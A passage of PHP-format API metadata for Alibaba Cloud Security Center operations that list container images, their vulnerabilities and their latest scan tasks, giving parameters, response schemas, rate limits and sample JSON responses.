'int64', 'example' => '1611201274000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the latest scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1611201274000', 'title' => ''], 'Tags' => ['description' => 'The label of the vulnerability. Valid values:'."\n" ."\n" .'- Restart required'."\n" .'- Remote utilization'."\n" .'- EXP exists'."\n" .'- Available'."\n" .'- Privilege escalation'."\n" .'- Code execution', 'type' => 'string', 'example' => 'EXP exists', 'title' => ''], 'LaterCount' => ['description' => 'The number of medium-risk vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '26', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'RHSA-2017:3075-Important: wget security update', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'debian:9:CVE-2019-3858', 'title' => ''], 'AsapCount' => ['description' => 'The number of high-risk vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '26', 'title' => ''], 'CanFix' => [ 'description' => 'Indicates whether the vulnerability can be fixed. Valid values:'."\n" .'- **yes**: The vulnerability can be fixed.'."\n" .'- **no**: The vulnerability cannot be fixed.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'yes', 'title' => '', ], 'RuleTag' => ['description' => 'The vulnerability tag. Valid values:'."\n" ."\n" .' - **AI**: vulnerabilities related to AI components.', 'type' => 'string', 'example' => 'AI', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image vulnerability information', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageGroupedVulList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageGroupedVulList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 2,\\n \\"RequestId\\": \\"5E244439-UJND-8BF7-26F36E21B9AA\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 21,\\n \\"GroupedVulItems\\": [\\n {\\n \\"Status\\": 0,\\n \\"Type\\": \\"cve\\",\\n \\"NntfCount\\": 29,\\n \\"GmtLast\\": 1611201274000,\\n \\"LastScanTime\\": 1611201274000,\\n \\"Tags\\": \\"EXP exists\\",\\n \\"LaterCount\\": 26,\\n \\"AliasName\\": \\"RHSA-2017:3075-Important: wget security update\\",\\n \\"Name\\": \\"debian:9:CVE-2019-3858\\",\\n \\"AsapCount\\": 26,\\n \\"CanFix\\": \\"yes\\",\\n \\"RuleTag\\": \\"AI\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageInfoList' => [ 'summary' => 'Query the image list.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server. Separate multiple UUIDs with commas (,).'."\n" .'> Call the [DescribeCloudCenterInstances](~~141932~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '391abd09184cbd3743d7f5ec125d****,'."\n" .'e6aeb2a5b6004479398b0bcd1160****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'BC3B0DAE-CC0E-59E9-9383-6F060F22****', 'title' => ''], 'ImageInfos' => [ 'description' => 'An array that consists of the information about images.', 'type' => 'array', 'items' => [ 'description' => 'The image object.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The image status.', 'type' => 'string', 'example' => 'NORMAL', 'title' => ''], 'Endpoints' => ['description' => 'The list of endpoints for the image service.', 'type' => 'string', 'example' => 'cn-hangzhou-x7', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether the image has security risks. Valid values:'."\n" ."\n" .'- **YES**: The image has risks.'."\n" .'- **NO**: The image does not have risks.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'VulStatus' => ['description' => 'Indicates whether the instance has vulnerabilities. Valid values:'."\n" .'- **YES**: Vulnerabilities exist.'."\n" .'- **NO**: No vulnerabilities exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'ImageCreate' => ['description' => 'The time when the image was created.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636962328000', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether the asset has security alerts. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => 'a3521b04dfdd1361a24be6263f2983cf12ba910989f4d9f7324da7e1e89f****', 'title' => ''], 'RegistryType' => ['description' => 'The registry type.', 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'ImageUpdate' => ['description' => 'The time when the image was last updated.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636974116000', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => 'v1', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the image instance.', 'type' => 'string', 'example' => 'i-wz95abw6pa7y79ve****', 'title' => ''], 'RepoType' => ['description' => 'The repository type. Valid values:'."\n" ."\n" .'- `PUBLIC`: public'."\n" ."\n" .'- `PRIVATE`: private', 'type' => 'string', 'example' => 'PUBLIC', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'ff9ca084-7faa-4ab2-8728-69024755****', 'title' => ''], 'ImageSize' => ['description' => 'The image size.', 'type' => 'integer', 'format' => 'int64', 'example' => '157408623', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'crr-5qk9v2rdt0s****', 'title' => ''], 'TagImmutable' => [ 'description' => 'The tag immutability.', 'enumValueTitles' => ['Mutable/Overwrite', 'Immutable/Append'], 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => '', ], 'VulCount' => ['description' => 'The total number of vulnerabilities in your assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts detected in the current pod, application, namespace, or cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ImageId' => ['description' => 'The ID of the image.', 'type' => 'string', 'example' => 'bb0175afea16138815a8900adeeb0315d88a83a2376eeffa14db1d693a15****', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'opa-test', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'libssh2', 'title' => ''], 'SourceBizTag' => ['title' => '', 'description' => 'The business purpose tag of the image.', 'type' => 'string', 'example' => 'PAI'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Image List for Console Asset Management', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageInfoList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageInfoList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BC3B0DAE-CC0E-59E9-9383-6F060F22****\\",\\n \\"ImageInfos\\": [\\n {\\n \\"Status\\": \\"NORMAL\\",\\n \\"Endpoints\\": \\"cn-hangzhou-x7\\",\\n \\"RiskStatus\\": \\"YES\\",\\n \\"VulStatus\\": \\"YES\\",\\n \\"ImageCreate\\": 1636962328000,\\n \\"AlarmStatus\\": \\"YES\\",\\n \\"Digest\\": \\"a3521b04dfdd1361a24be6263f2983cf12ba910989f4d9f7324da7e1e89f****\\",\\n \\"RegistryType\\": \\"harbor\\",\\n \\"ImageUpdate\\": 1636974116000,\\n \\"Tag\\": \\"v1\\",\\n \\"InstanceId\\": \\"i-wz95abw6pa7y79ve****\\",\\n \\"RepoType\\": \\"PUBLIC\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Uuid\\": \\"ff9ca084-7faa-4ab2-8728-69024755****\\",\\n \\"ImageSize\\": 157408623,\\n \\"RepoId\\": \\"crr-5qk9v2rdt0s****\\",\\n \\"TagImmutable\\": 0,\\n \\"VulCount\\": 1,\\n \\"AlarmCount\\": 10,\\n \\"ImageId\\": \\"bb0175afea16138815a8900adeeb0315d88a83a2376eeffa14db1d693a15****\\",\\n \\"RepoName\\": \\"opa-test\\",\\n \\"RepoNamespace\\": \\"libssh2\\",\\n \\"SourceBizTag\\": \\"PAI\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageInstances' => [ 'summary' => 'Retrieves a list of image information.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92107', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'Sets the conditions for searching assets. This parameter is in JSON format and contains the following fields:'."\n" .'- **name**: The search item.'."\n" .'- **value**: The value of the search item.'."\n" .'- **logicalExp**: The logical relationship between multiple search item values. Valid values:'."\n" .' - **OR**: The multiple search item values are in an **OR** relationship.'."\n" .' - **AND**: The multiple search item values are in an **AND** relationship.'."\n" .'> You can call the [DescribeImageRepoCriteria](~~DescribeImageRepoCriteria~~) operation to query supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"instanceId","value":"390100182","logicalExp":"AND"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'Sets the logical relationship between multiple search conditions. Valid values:'."\n" ."\n" .'- **OR**: The multiple search conditions are in an **OR** relationship.'."\n" .'- **AND**: The multiple search conditions are in an **AND** relationship.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page during a paged query. The default number of entries per page is 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> We recommend that you do not leave the PageSize parameter empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the returned results to start displaying. The starting value is **1**. Default value: **1**, which indicates that page 1 is displayed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Scanned', 'in' => 'query', 'schema' => ['description' => 'Indicates whether the image has been scanned. Valid values:'."\n" .'- **true**: processed.'."\n" .'- **false**: not processed.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries of image information displayed on each page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of images.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of images displayed on the current page of the returned results.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageInstanceList' => [ 'description' => 'The list of image information.', 'type' => 'array', 'items' => [ 'description' => 'The image information.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The image status. Valid values:'."\n" .'- **NORMAL**: normal.', 'type' => 'string', 'example' => 'NORMAL', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => 'a5ccdd9b166b67e02954aa9b618fe19b7968bd56a15463d2ad7f2643ba5b****', 'title' => ''], 'RegistryType' => ['description' => 'The registry type of the image. Valid values:'."\n" .'- **acr**: ACR.'."\n" .'- **harbor**: Harbor.'."\n" .'- **quay**: Quay.'."\n" .'- **CI/CD**: CI/CD repository type.', 'type' => 'string', 'example' => 'acr', 'title' => ''], 'Tag' => ['description' => 'The tag of the image.', 'type' => 'string', 'example' => 'mysql_5.7', 'title' => ''], 'ImageUpdate' => ['description' => 'The timestamp when the image was updated. Unit: milliseconds.', 'type' => 'string', 'example' => '1600069948849', 'title' => ''], 'RepoType' => ['description' => 'The repository type. Valid values:'."\n" ."\n" .'- **private**: private repository.'."\n" .'- **public**: public repository.', 'type' => 'string', 'example' => 'private', 'title' => ''], 'ImageSize' => ['description' => 'The size of the image. Unit: MB.', 'type' => 'string', 'example' => '1604487690', 'title' => ''], 'HcStatus' => ['description' => 'The baseline risk status. Valid values:'."\n" ."\n" .'- **NO**: no baseline risk exists.'."\n" .'- **YES**: baseline risk exists.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities in the image.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageId' => ['description' => 'The ID of the image.', 'type' => 'string', 'example' => 'c20987f18b130f9d144c9828df630417e2a9523148930dc3963e9d0dab30****', 'title' => ''], 'Endpoints' => ['description' => 'The endpoint addresses of the image resource.', 'type' => 'string', 'example' => '[]', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether a risk exists. Valid values:'."\n" ."\n" .'- **NO**: no risk.'."\n" .'- **YES**: risk exists.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'ImageCreate' => ['description' => 'The timestamp when the image was created. Unit: milliseconds.', 'type' => 'string', 'example' => '1600069948849', 'title' => ''], 'VulStatus' => ['description' => 'Indicates whether vulnerabilities exist in the image. Valid values:'."\n" .'- **YES**: vulnerabilities exist.'."\n" .'- **NO**: no vulnerabilities exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether security alerts exist for the image. Valid values:'."\n" .'- **YES**: security alerts exist.'."\n" .'- **NO**: no security alerts exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'ScaProgress' => ['description' => 'The scan progress of the image. Value range: 0 to 100.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the image asset.', 'type' => 'string', 'example' => '39010****', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the image is located.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'ScaStatus' => ['description' => 'The image scan status. Valid values:'."\n" .'- **INIT**: image scan pending.'."\n" .'- **START**: image scan started.'."\n" .'- **MESSAGE_SEND**: image scan message sent.'."\n" .'- **START_RUN**: image analysis task started.'."\n" .'- **DOWNLOAD**: image scan downloaded.'."\n" .'- **PRE_ANALYZER**: image pre-analysis started.'."\n" .'- **WEB\\_SHELL_ANALYZER**: image WebShell analysis completed.'."\n" .'- **CVE_ANALYZER**: image CVE analysis completed.'."\n" .'- **BIN_ANALYZER**: image binary analysis completed.'."\n" .'- **OTHER_ANALYZER**: image extended analysis completed.'."\n" .'- **SUCCESS**: image scan completed.'."\n" .'- **PRE\\_ANALYZER_SUCCESS**: image pre-analysis completed.'."\n" .'- **FAIL**: image scan failed.'."\n" .'- **TIMEOUT**: image scan timed out.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '12f80307-60aa-4efa-863a-56d72fb****', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'f2b86d20bf0855af6aa268ce90fd****', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ScaResult' => ['description' => 'The error code of the image scan result. Valid values:'."\n" ."\n" .'- **TASK\\_NOT_EXISTS**: the task does not exist.'."\n" .'- **TASK\\_NOT\\_SUPPORT_REGION**: the task does not support the region.'."\n" .'- **forbid\\_create\\_repeat_task**: repeated tasks are not allowed.', 'type' => 'string', 'example' => 'TASK_NOT_SUPPORT_REGION', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'sas-script-test', 'title' => ''], 'AlarmCount' => ['description' => 'The number of security alerts for the image.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'N/A', 'title' => ''], 'Deployed' => ['description' => 'Indicates whether the image has been deployed. Valid values:'."\n" .'- **0**: not deployed.'."\n" .'- **1**: deployed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the latest scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1721363159000', 'title' => ''], 'SourceBizTag' => ['title' => '', 'description' => 'The business tag of the image.', 'type' => 'string', 'example' => 'PAI'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve image information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 4\\n },\\n \\"ImageInstanceList\\": [\\n {\\n \\"Status\\": \\"NORMAL\\",\\n \\"Digest\\": \\"a5ccdd9b166b67e02954aa9b618fe19b7968bd56a15463d2ad7f2643ba5b****\\",\\n \\"RegistryType\\": \\"acr\\",\\n \\"Tag\\": \\"mysql_5.7\\",\\n \\"ImageUpdate\\": \\"1600069948849\\",\\n \\"RepoType\\": \\"private\\",\\n \\"ImageSize\\": \\"1604487690\\",\\n \\"HcStatus\\": \\"NO\\",\\n \\"VulCount\\": 0,\\n \\"ImageId\\": \\"c20987f18b130f9d144c9828df630417e2a9523148930dc3963e9d0dab30****\\",\\n \\"Endpoints\\": \\"[]\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"ImageCreate\\": \\"1600069948849\\",\\n \\"VulStatus\\": \\"NO\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"ScaProgress\\": 100,\\n \\"InstanceId\\": \\"39010****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"ScaStatus\\": \\"SUCCESS\\",\\n \\"Uuid\\": \\"12f80307-60aa-4efa-863a-56d72fb****\\",\\n \\"RepoId\\": \\"f2b86d20bf0855af6aa268ce90fd****\\",\\n \\"HcCount\\": 0,\\n \\"ScaResult\\": \\"TASK_NOT_SUPPORT_REGION\\",\\n \\"RepoName\\": \\"sas-script-test\\",\\n \\"AlarmCount\\": 0,\\n \\"RepoNamespace\\": \\"N/A\\",\\n \\"Deployed\\": 1,\\n \\"LastScanTime\\": 1721363159000,\\n \\"SourceBizTag\\": \\"PAI\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageLatestScanTask' => [ 'summary' => 'Queries the most recent scan task for an image.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Digest', 'in' => 'query', 'schema' => ['description' => 'The digest of the image.', 'type' => 'string', 'required' => true, 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The scan task data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], 'Task' => [ 'description' => 'The task information.', 'type' => 'array', 'items' => [ 'description' => 'The task information.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The task status. Valid values:'."\n" ."\n" .'- **PROCESSING**: The task is being executed.'."\n" .'- **START**: The task is starting.'."\n" .'- **MESSAGE_SEND**: The scan is being distributed.'."\n" .'- **PRE_ANALYZER**: The image is being pre-checked.'."\n" .'- **SUCCESS**: The task is executed.'."\n" .'- **FAIL**: The task failed.'."\n" .'- **TIMOUT**: The task timed out.', 'type' => 'string', 'example' => 'SUCCESS', 'title' => ''], 'Modified' => ['description' => 'The time when the task was last modified. Format: yyyy-MM-ddTHH:mm:ss.', 'type' => 'string', 'example' => '2022-12-20 12:00:05', 'title' => ''], 'FinishTime' => ['description' => 'The time when the task ended. This parameter is returned only when the task status is Finished. Otherwise, an empty value is returned.', 'type' => 'integer', 'format' => 'int64', 'example' => '1669693430977', 'title' => ''], 'Create' => ['description' => 'The time when the task was created. Format: yyyy-MM-ddTHH:mm:ss.', 'type' => 'string', 'example' => '2022-12-20 11:59:05', 'title' => ''], 'Finish' => ['description' => 'The number of completed image tasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Source' => ['description' => 'The creation method. Valid values:'."\n" ."\n" .'- **console_batch**: console'."\n" .'- **openapi**: API.', 'type' => 'string', 'example' => 'console_batch', 'title' => ''], 'StartTime' => ['description' => 'The time when the task started.', 'type' => 'integer', 'format' => 'int64', 'example' => '1668614400000', 'title' => ''], 'TaskType' => ['description' => 'The task type. Valid values:'."\n" .'- **IMAGE\\_SCAN**: image scan.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'Name' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'string', 'example' => '0a960b9a48b788a8689154b032bf****', 'title' => ''], 'Target' => ['description' => 'The digest of the target image.', 'type' => 'string', 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****', 'title' => ''], 'Id' => ['description' => 'The task ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '9755662', 'title' => ''], 'TargetType' => ['description' => 'The scan target type. Valid values:'."\n" ."\n" .'- **IMAGE**: image.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the most recent scan status of an image', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageLatestScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageLatestScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"Task\\": [\\n {\\n \\"Status\\": \\"SUCCESS\\",\\n \\"Modified\\": \\"2022-12-20 12:00:05\\",\\n \\"FinishTime\\": 1669693430977,\\n \\"Create\\": \\"2022-12-20 11:59:05\\",\\n \\"Finish\\": 100,\\n \\"Source\\": \\"console_batch\\",\\n \\"StartTime\\": 1668614400000,\\n \\"TaskType\\": \\"IMAGE_SCAN\\",\\n \\"Name\\": \\"IMAGE_SCAN\\",\\n \\"TaskId\\": \\"0a960b9a48b788a8689154b032bf****\\",\\n \\"Target\\": \\"8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****\\",\\n \\"Id\\": 9755662,\\n \\"TargetType\\": \\"IMAGE\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageListByBuildRisk' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level. Valid values:'."\n" .'- **high**'."\n" .'- **medium**'."\n" .'- **low**.', 'type' => 'string', 'required' => false, 'example' => 'medium', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in paging query. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'RiskKey', 'in' => 'query', 'schema' => ['description' => 'The key of the build risk rule. You can call the [DescribeImageBuildRiskList](~~~~) operation to obtain the RiskKey.', 'type' => 'string', 'required' => false, 'example' => 'no_user', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the alert event to query. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Ignored.'."\n" .'- **2**: False positive.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The value of the condition parameter.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The name of the condition parameter. Valid values:'."\n" .'- **RepoNamespace**: namespace.'."\n" .'- **RepoName**: repository name.', 'type' => 'string', 'required' => false, 'example' => 'RepoNamespace', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult>', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of images.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the image.', 'type' => 'string', 'example' => '6ec898e6274f942e0e4a053eff1c****', 'title' => ''], 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the image repository.', 'type' => 